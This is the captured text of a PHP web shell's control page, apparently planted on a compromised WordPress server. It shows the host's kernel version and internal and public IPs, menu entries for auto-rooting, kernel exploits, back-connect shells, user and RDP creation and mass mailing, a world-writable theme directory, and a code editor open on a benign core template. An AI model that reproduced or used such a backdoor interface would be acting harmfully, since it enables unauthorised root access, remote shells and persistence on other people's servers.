Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.224.0.57
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
ru-website /
wp-includes /
theme-compat /
[ HOME SHELL ]
Name
Size
Permission
Action
comments.php
2.09
KB
-rwxrwxrwx
embed-404.php
972
B
-rwxrwxrwx
embed-content.php
3.37
KB
-rwxrwxrwx
embed.php
481
B
-rwxrwxrwx
footer-embed.php
438
B
-rwxrwxrwx
footer.php
1.03
KB
-rwxrwxrwx
header-embed.php
702
B
-rwxrwxrwx
header.php
1.85
KB
-rwxrwxrwx
sidebar.php
4.18
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : embed.php
<?php /** * Contains the post embed base template * * When a post is embedded in an iframe, this file is used to create the output * if the active theme does not include an embed.php template. * * @package WordPress * @subpackage oEmbed * @since 4.4.0 */ get_header( 'embed' ); if ( have_posts() ) : while ( have_posts() ) : the_post(); get_template_part( 'embed', 'content' ); endwhile; else : get_template_part( 'embed', '404' ); endif; get_footer( 'embed' );
Close